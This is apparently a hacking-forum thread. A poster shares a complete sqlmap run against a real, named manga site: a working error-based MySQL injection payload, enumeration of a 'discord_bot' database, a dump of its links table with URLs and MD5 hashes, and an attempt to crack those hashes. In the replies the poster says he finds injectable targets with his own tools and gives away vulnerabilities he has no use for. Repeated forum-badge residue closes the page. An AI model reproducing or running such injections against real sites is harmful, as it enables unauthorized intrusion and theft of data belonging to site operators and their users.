 ___ ___[,]_____ ___ ___  {1.9.9#pip}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey a                                                       ll applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this progra                                                       m

[*] starting @ 09:38:39 /2025-09-14/

[09:38:39] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrom                                                       e/4.0.222.4 Safari/532.2' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[09:38:39] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap                                                        could be able to run properly
[09:38:39] [INFO] resuming back-end DBMS 'mysql'
[09:38:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://manhuaplus.org/filter/2/?chapter_count=0&genres=&notGenres= (SELECT 7516 FROM(SELECT COUNT(*),CONCAT(0x71707a7171,(SELECT (EL                                                       T(7516=7516,1))),0x71626b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[09:38:40] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:38:40] [INFO] fetching tables for database: 'discord_bot'
[09:38:40] [INFO] starting 2 threads
[09:38:40] [INFO] resumed: 'token'
[09:38:40] [INFO] resumed: 'links'
Database: discord_bot
[2 tables]
+-------+
| links |
| token |
+-------+

[09:38:40] [INFO] fetching columns for table 'token' in database 'discord_bot'
[09:38:40] [INFO] starting 3 threads
[09:38:40] [INFO] resumed: 'token'
[09:38:40] [INFO] resumed: 'varchar(32)'
[09:38:40] [INFO] resumed: 'expire'
[09:38:40] [INFO] resumed: 'timestamp'
[09:38:40] [INFO] retrieved: 'id'
[09:38:40] [INFO] resumed: 'int(11)'
[09:38:40] [INFO] fetching columns for table 'links' in database 'discord_bot'
[09:38:40] [INFO] starting 6 threads
[09:38:40] [INFO] resumed: 'sv1'
[09:38:40] [INFO] resumed: 'id'
[09:38:40] [INFO] resumed: 'sv2'
[09:38:40] [INFO] resumed: 'int(11)'
[09:38:40] [INFO] resumed: 'time'
[09:38:40] [INFO] resumed: 'sv3'
[09:38:40] [INFO] resumed: 'varchar(236)'
[09:38:40] [INFO] resumed: 'datetime'
[09:38:40] [INFO] retrieved: 'hash'
[09:38:40] [INFO] resumed: 'varchar(32)'
Database: discord_bot
Table: token
[3 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| expire | timestamp   |
| id     | int(11)     |
| token  | varchar(32) |
+--------+-------------+

Database: discord_bot
Table: links
[6 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| hash   | varchar(32)  |
| time   | datetime     |
| id     | int(11)      |
| sv1    |
| sv2    |
| sv3    | varchar(236) |
+--------+--------------+

[09:38:42] [INFO] fetching columns for table 'token' in database 'discord_bot'
[09:38:42] [INFO] starting 3 threads
[09:38:42] [INFO] resumed: 'token'
[09:38:42] [INFO] resumed: 'id'
[09:38:42] [INFO] resumed: 'varchar(32)'
[09:38:42] [INFO] resumed: 'expire'
[09:38:42] [INFO] resumed: 'int(11)'
[09:38:42] [INFO] resumed: 'timestamp'
[09:38:43] [INFO] fetching entries for table 'token' in database 'discord_bot'
[09:38:44] [WARNING] reflective value(s) found and filtering out
[09:38:44] [WARNING] the SQL query provided does not return any output
[09:38:44] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[09:38:44] [WARNING] unable to retrieve the entries for table 'token' in database 'discord_bot'
[09:38:44] [INFO] fetching columns for table 'links' in database 'discord_bot'
[09:38:44] [INFO] starting 6 threads
[09:38:44] [INFO] resumed: 'id'
[09:38:44] [INFO] resumed: 'hash'
[09:38:44] [INFO] resumed: 'int(11)'
[09:38:44] [INFO] resumed: 'sv1'
[09:38:44] [INFO] resumed: 'varchar(32)'
[09:38:44] [INFO] resumed: 'sv2'
[09:38:44] [INFO] resumed: 'sv3'
[09:38:44] [INFO] resumed: 'time'
[09:38:44] [INFO] resumed: 'varchar(236)'
[09:38:44] [INFO] resumed: 'datetime'
[09:38:44] [INFO] retrieved: 'varchar(256)'
[09:38:44] [INFO] retrieved: 'varchar(256)'
[09:38:44] [INFO] fetching entries for table 'links' in database 'discord_bot'
[09:38:45] [INFO] starting 10 threads
[09:38:46] [INFO] retrieved: 'c1a8602d6526dcf77d71caf0dcadb90f'
[09:38:46] [INFO] retrieved: '2f3dd331ca9f772d45772bf2135f23ca'
[09:38:46] [INFO] retrieved: 'ed51bd79916513023a2fae19d58283b6'
[09:38:46] [INFO] retrieved: 'b3ec5b7b954d2f2bba33ecd9de2392b0'
[09:38:46] [INFO] retrieved: 'b34e23e187b85bae464ba8a5ab286cf5'
[09:38:46] [INFO] retrieved: '0dc4ccefddbe9ffc6df20824e4c27307'
[09:38:46] [INFO] retrieved: '5b92a921bd2153e0c0bfdb005cb75514'
[09:38:46] [INFO] retrieved: '6e839673f3c78ec72139cb5d8df26503'
[09:38:46] [INFO] retrieved: 'd8fd5d41c3015f44a113241b116764f3'
[09:38:46] [INFO] retrieved: '5f7a4130064e888f2cb6cb2bdec37489'
[09:38:46] [INFO] retrieved: '2023-11-30 23:27:02'
[09:38:46] [INFO] retrieved: '2023-11-30 23:28:01'
[09:38:46] [INFO] retrieved: '2023-12-02 23:51:29'
[09:38:46] [INFO] retrieved: '2023-12-02 23:50:26'
[09:38:46] [INFO] retrieved: '2023-12-13 16:03:48'
[09:38:46] [INFO] retrieved: '2023-12-01 21:02:30'
[09:38:46] [INFO] retrieved: '2023-12-01 20:57:18'
[09:38:46] [INFO] retrieved: '6'
[09:38:46] [INFO] retrieved: '9'
[09:38:46] [INFO] retrieved: '4'
[09:38:46] [INFO] retrieved: '10'
[09:38:46] [INFO] retrieved: '8'
[09:38:47] [INFO] retrieved: 'https://storage.doctruyen5s.top:2083/storage/1701439346-1d803eac016966be7d7b21aa21448440.zip'
[09:38:47] [INFO] retrieved: '7'
[09:38:48] [INFO] retrieved: ''
[09:38:48] [INFO] retrieved: ''
[09:38:48] [INFO] retrieved: 'https://katfile.com/tzlj9wp02aei'
[09:38:48] [INFO] retrieved: 'https://storage.doctruyen5s.top:2083/storage/1701439547-1baede8d8739f0e64d965a1259cd98ce.zip'
[09:38:48] [INFO] retrieved: 'https://storage.doctruyen5s.top:2083/storage/1701439035-1d803eac016966be7d7b21aa21448440.zip'
[09:38:48] [INFO] retrieved: 'https://storage.doctruyen5s.top:2083/storage/170153'
[09:38:48] [INFO] retrieved: '1'
[09:38:49] [INFO] retrieved: 'https://katfile.com/d8ncy9g1pxm7'
[09:38:49] [INFO] retrieved: 'https://katfile.com/kawfancag3jn'
[09:38:49] [INFO] retrieved: 'https://uploading.vn/4blgxkzxblzr'
[09:38:49] [INFO] retrieved: ''
[09:38:49] [INFO] retrieved: 'https://katfile.com/zi5cbtyqi44b'
[09:38:49] [INFO] retrieved: 'https://katfile.com/sg3hha7v2n7i'
[09:38:49] [INFO] retrieved: ''
[09:38:49] [INFO] retrieved: 'bfd622b0fae5439940b4a5d0646170b8'
[09:38:49] [INFO] retrieved: ''
[09:38:49] [INFO] retrieved: ''
[09:38:49] [INFO] retrieved: ''
[09:38:49] [INFO] retrieved: ''
[09:38:49] [INFO] retrieved: ''
[09:38:49] [INFO] retrieved: ''
[09:38:49] [INFO] retrieved: 'https://katfile.com/kdlqcgoi08pf/Phieu-soi-dap-an.doc.html'
[09:38:49] [INFO] retrieved: '2023-12-14 22:51:10'
[09:38:49] [INFO] retrieved: 'ff009ec27864af7cd87c4c0c4f4ebc3d'
[09:38:49] [INFO] retrieved: ''
[09:38:49] [INFO] retrieved: '1509dd3e31d230a55120244f65a92bd0'
[09:38:50] [INFO] retrieved: '2023-12-27 20:42:57'
[09:38:50] [INFO] retrieved: '2023-12-13 16:05:39'
[09:38:50] [INFO] retrieved: '2023-12-27 20:47:29'
[09:38:50] [INFO] retrieved: '12'
[09:38:50] [INFO] retrieved: '13'
[09:38:50] [INFO] retrieved: 'https://katfile.com/kdlqcgoi08pf/Phieu-soi-dap-an.doc.html'
[09:38:50] [INFO] retrieved: '11'
[09:38:50] [INFO] retrieved: '14'
[09:38:51] [INFO] retrieved: '15'
[09:38:51] [INFO] retrieved: 'https://katfile.com/4afb7h651ta7'
[09:38:51] [INFO] retrieved: 'https://storage.doctruyen5s.top:2083/storage/170245'
[09:38:52] [INFO] retrieved: ''
[09:38:52] [INFO] retrieved: 'https://katfile.com/7llwutle22ox'
[09:38:52] [INFO] retrieved: ''
[09:38:52] [INFO] retrieved: ''
[09:38:52] [INFO] retrieved: ''
[09:38:52] [INFO] retrieved: ''
[09:38:52] [INFO] retrieved: ''
[09:38:52] [INFO] recognized possible password hashes in column '`hash`'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[09:38:52] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[09:38:52] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[09:38:52] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[09:38:52] [INFO] starting 48 processes
[09:39:00] [WARNING] no clear password(s) found
Database: discord_bot
Table: links
[15 entries]
+------+----------------------------------------------------------------------------------------------+-------------------------------------------                                                       -----------------+------------------------------------------------------------+----------------------------------+---------------------+
| id   | sv1                                                                                          | sv2                                                                                                               | sv3                                                        | hash                             | time                |
+------+----------------------------------------------------------------------------------------------+-------------------------------------------                                                       -----------------+------------------------------------------------------------+----------------------------------+---------------------+
| 1    | https://uploading.vn/4blgxkzxblzr                                                            | https://katfile.com/kdlqcgoi08pf/Phieu-soi                                                       -dap-an.doc.html | https://katfile.com/kdlqcgoi08pf/Phieu-soi-dap-an.doc.html | d8fd5d41c3015f44a113241b116764f3 |                     |
|      | <blank>                                                                                      | https://katfile.com/zi5cbtyqi44b                                                                                  | <blank>                                                    | c1a8602d6526dcf77d71caf0dcadb90f |                     |
|      | <blank>                                                                                      |                                                                                                                   | <blank>                                                    | ed51bd79916513023a2fae19d58283b6 | 2023-11-30 23:27:02 |
| 4    |                                                                                              |                                                                                                                   | <blank>                                                    | 2f3dd331ca9f772d45772bf2135f23ca | 2023-11-30 23:28:01 |
|      | https://storage.doctruyen5s.top:2083/storage/1701439035-1d803eac016966be7d7b21aa21448440.zip | https://katfile.com/kawfancag3jn                                                                                  | <blank>                                                    | 5f7a4130064e888f2cb6cb2bdec37489 | 2023-12-01 20:57:18 |
| 6    | https://storage.doctruyen5s.top:2083/storage/1701439346-1d803eac016966be7d7b21aa21448440.zip |                                                                                                                   | <blank>                                                    | b34e23e187b85bae464ba8a5ab286cf5 | 2023-12-01 21:02:30 |
| 7    | https://storage.doctruyen5s.top:2083/storage/1701439547-1baede8d8739f0e64d965a1259cd98ce.zip | https://katfile.com/sg3hha7v2n7i                                                                                  | <blank>                                                    | 5b92a921bd2153e0c0bfdb005cb75514 |                     |
| 8    | https://storage.doctruyen5s.top:2083/storage/170153                                          | https://katfile.com/d8ncy9g1pxm7                                                                                  | <blank>                                                    | b3ec5b7b954d2f2bba33ecd9de2392b0 | 2023-12-02 23:50:26 |
| 9    |                                                                                              |                                                                                                                   | <blank>                                                    | 0dc4ccefddbe9ffc6df20824e4c27307 | 2023-12-02 23:51:29 |
| 10   |                                                                                              | https://katfile.com/tzlj9wp02aei                                                                                  | <blank>                                                    | 6e839673f3c78ec72139cb5d8df26503 | 2023-12-13 16:03:48 |
| 11   | https://storage.doctruyen5s.top:2083/storage/170245                                          | https://katfile.com/7llwutle22ox                                                                                  | <blank>                                                    |                                  | 2023-12-13 16:05:39 |
| 12   |                                                                                              |                                                                                                                   | <blank>                                                    | bfd622b0fae5439940b4a5d0646170b8 | 2023-12-14 22:51:10 |
| 13   |                                                                                              | https://katfile.com/4afb7h651ta7                                                                                  | <blank>                                                    | 1509dd3e31d230a55120244f65a92bd0 | 2023-12-27 20:42:57 |
| 14   |                                                                                              |                                                                                                                   | <blank>                                                    | ff009ec27864af7cd87c4c0c4f4ebc3d | 2023-12-27 20:47:29 |
| 15   |                                                                                              | <blank>                                                                                                           | <blank>                                                    |                                  |                     |
+------+----------------------------------------------------------------------------------------------+-------------------------------------------                                                       -----------------+------------------------------------------------------------+----------------------------------+---------------------+

[09:39:00] [INFO] table 'discord_bot.links' dumped to CSV file '/root/.local/share/sqlmap/output/manhuaplus.org/dump/discord_bot/links.csv'
[09:39:00] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/manhuaplus.org'

[*] ending @ 09:39:00 /2025-09-14/

кекич · 15.09.2025

где взял куки админа?

MrDark · 15.09.2025

кекич сказал(а):

where did you get the admin cookies?

Secret )

looonely_creature · 16.09.2025

MrDark сказал(а):

None, I am using my own created tools that pre-finds injectable endpoints and does some small payload encoded tests to pre-confirm if the target is actually vuln or not.

i mean from where do you find these targets .

MrDark · 17.09.2025

looonely_creature сказал(а):

i mean from where do you find these targets .

Experience.

SQL injections and other vulnerabilities that I find and have no use with it

Bratva

(L3) cache

Bratva

HDD-drive

Bratva

HDD-drive

Bratva

Bratva

Bratva

Bratva

(L3) cache

HDD-drive

Bratva

Bratva

Bratva

Bratva

RAID-массив

Bratva

HDD-drive

Bratva